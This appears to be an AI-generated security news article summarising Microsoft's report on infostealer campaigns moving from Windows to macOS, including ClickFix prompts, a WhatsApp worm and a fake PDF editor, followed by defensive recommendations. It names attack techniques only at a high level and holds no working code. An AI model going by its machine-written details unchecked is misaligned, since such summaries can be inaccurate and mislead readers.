Ethical Hacking News
A new wave of info-stealing attacks has been detected expanding from Microsoft Windows to macOS, utilizing social engineering tactics and exploiting vulnerabilities in trusted platforms. The malicious campaigns pose a significant threat to Mac users and organizations worldwide, emphasizing the need for a layered defense strategy to stop these threats.
Cybersecurity experts warn of a new wave of info-stealing attacks expanding from Microsoft Windows to macOS. The attackers use social engineering tactics, exploit vulnerabilities in trusted platforms, and pose a significant threat to Mac users and organizations worldwide. The campaigns leverage cross-platform languages like Python, abused trusted apps like WhatsApp, and native tools to steal credentials, crypto, and session data. Fileless execution, AppleScript automation, and other tactics are used to harvest sensitive information from Mac users. Phishing emails, fileless execution, and abuse of trusted platforms are used to spread Python-based stealers that can steal logins, financial data, and browser sessions. Malware is spreading through WhatsApp and PDF tools, turning normal apps into delivery channels for credential and crypto theft. To combat these threats, Microsoft advises a layered defense strategy, including monitoring macOS for risky Terminal activity and inspecting outbound traffic.
Cybersecurity experts have sounded the alarm as a new wave of info-stealing attacks has been detected expanding from Microsoft Windows to macOS. The malicious campaigns, which utilize social engineering tactics and exploit vulnerabilities in trusted platforms, pose a significant threat to Mac users and organizations worldwide.
According to recent reports, the attackers are leveraging cross-platform languages like Python to deploy macOS-specific infostealers, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data while evading defenses. The campaigns have been observed using fileless execution, AppleScript automation, and other tactics to harvest sensitive information from Mac users.
The most recent example of this threat was reported by Microsoft, which revealed that the company had observed a surge in macOS infostealer attacks since late 2025. These attacks were found to be using social engineering techniques, including ClickFix-style prompts and malicious DMG installers, to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).
These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments. Attackers are also using phishing emails to spread Python-based stealers, which can steal logins, financial data, and browser sessions.
Moreover, attackers are abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft. In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VB script that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.
In September 2025, Microsoft uncovered a fake "Crystal PDF" editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.
To combat these threats, Microsoft has advised Mac users to adopt a layered defense strategy to stop macOS, Python-based, and platform-abuse infostealers. The company recommends training users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoiding unsigned DMGs or "terminal fixes." It also advises monitoring macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains.
Users should also watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets. Inspecting outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration is crucial. Blocking known command-and-control servers using threat intelligence and strengthening defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing, can also help prevent attacks.
Enabling cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection is essential. Applying attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads will further enhance security.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Threat-Landscape-Info-Stealing-Attacks-on-macOS-Expand-from-Windows-ehn.shtml
https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html
Published: Wed Feb 4 07:51:29 2026 by llama3.2 3B Q4_K_M
